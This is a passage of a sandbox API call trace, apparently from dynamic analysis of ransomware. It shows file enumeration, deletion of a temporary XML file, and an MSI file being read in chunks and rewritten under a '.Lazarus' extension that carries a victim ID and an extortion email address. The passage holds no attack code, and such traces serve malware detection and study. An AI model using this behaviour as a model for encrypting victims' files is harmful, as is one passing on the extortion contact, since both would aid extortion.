Size=0xe) returned 0x7d618 [0078.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0078.197] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327ef70*=0x6b0, lpOverlapped=0x0) returned 1 [0078.197] CloseHandle (hObject=0x42c) returned 1 [0078.204] CloseHandle (hObject=0x428) returned 1 [0078.204] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.207] GetFileType (hFile=0x428) returned 0x1 [0078.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0078.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0078.207] GetLastError () returned 0xb7 [0078.207] SetLastError (dwErrCode=0xb7) [0078.207] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0078.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0078.208] CloseHandle (hObject=0x428) returned 1 [0078.209] AreFileApisANSI () returned 1 [0078.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0078.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0078.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0078.209] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0078.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.210] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.210] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x1, dwReserved1=0x0, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0078.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0078.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0078.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.211] AreFileApisANSI () returned 1 [0078.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", lpUsedDefaultChar=0x0) returned 39 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0078.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.211] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0078.211] AreFileApisANSI () returned 1 [0078.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d108 [0078.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d108, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0078.212] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.212] GetFileType (hFile=0x428) returned 0x1 [0078.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0078.212] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0078.212] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0078.379] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0078.380] CloseHandle (hObject=0x428) returned 1 [0078.433] AreFileApisANSI () returned 1 [0078.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d738 [0078.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0078.433] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.434] GetFileType (hFile=0x428) returned 0x1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0078.434] CloseHandle (hObject=0x428) returned 1 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.435] AreFileApisANSI () returned 1 [0078.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d108 [0078.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d108, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0078.435] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200)) returned 1 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0078.435] AreFileApisANSI () returned 1 [0078.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0078.435] GetLastError () returned 0x0 [0078.435] SetLastError (dwErrCode=0x0) [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0078.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0078.436] GetLastError () returned 0x0 [0078.436] SetLastError (dwErrCode=0x0) [0078.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0078.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0078.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0078.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0078.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0078.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0078.436] AreFileApisANSI () returned 1 [0078.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0078.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xca) returned 0x74a18 [0078.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x74a18, cchWideChar=101 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 101 [0078.436] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0078.436] GetFileType (hFile=0x428) returned 0x1 [0078.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74a18 | out: hHeap=0x20000) returned 1 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0078.437] AreFileApisANSI () returned 1 [0078.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d000 [0078.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x6d000, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0078.437] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.437] GetFileType (hFile=0x430) returned 0x1 [0078.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0078.437] GetLastError () returned 0x0 [0078.437] SetLastError (dwErrCode=0x0) [0078.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0078.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.437] GetLastError () returned 0x0 [0078.437] SetLastError (dwErrCode=0x0) [0078.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0078.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0078.438] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0078.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0078.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0078.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0078.440] GetLastError () returned 0x0 [0078.440] SetLastError (dwErrCode=0x0) [0078.440] GetLastError () returned 0x0 [0078.440] SetLastError (dwErrCode=0x0) [0078.440] GetLastError () returned 0x0 [0078.440] SetLastError (dwErrCode=0x0) [0078.440] GetLastError () returned 0x0 [0078.441] SetLastError (dwErrCode=0x0) [0078.441] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.441] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.442] GetLastError () returned 0x0 [0078.442] SetLastError (dwErrCode=0x0) [0078.442] GetLastError () returned 0x0 [0078.442] SetLastError (dwErrCode=0x0) [0078.443] GetLastError () returned 0x0 [0078.443] SetLastError (dwErrCode=0x0) [0078.443] GetLastError () returned 0x0 [0078.443] SetLastError (dwErrCode=0x0) [0078.443] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.443] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.443] GetLastError () returned 0x0 [0078.443] SetLastError (dwErrCode=0x0) [0078.443] GetLastError () returned 0x0 [0078.443] SetLastError (dwErrCode=0x0) [0078.443] GetLastError () returned 0x0 [0078.444] SetLastError (dwErrCode=0x0) [0078.444] GetLastError () returned 0x0 [0078.444] SetLastError (dwErrCode=0x0) [0078.444] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.444] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.444] GetLastError () returned 0x0 [0078.444] SetLastError (dwErrCode=0x0) [0078.444] GetLastError () returned 0x0 [0078.444] SetLastError (dwErrCode=0x0) [0078.444] GetLastError () returned 0x0 [0078.444] SetLastError (dwErrCode=0x0) [0078.445] GetLastError () returned 0x0 [0078.445] SetLastError (dwErrCode=0x0) [0078.445] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.445] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, 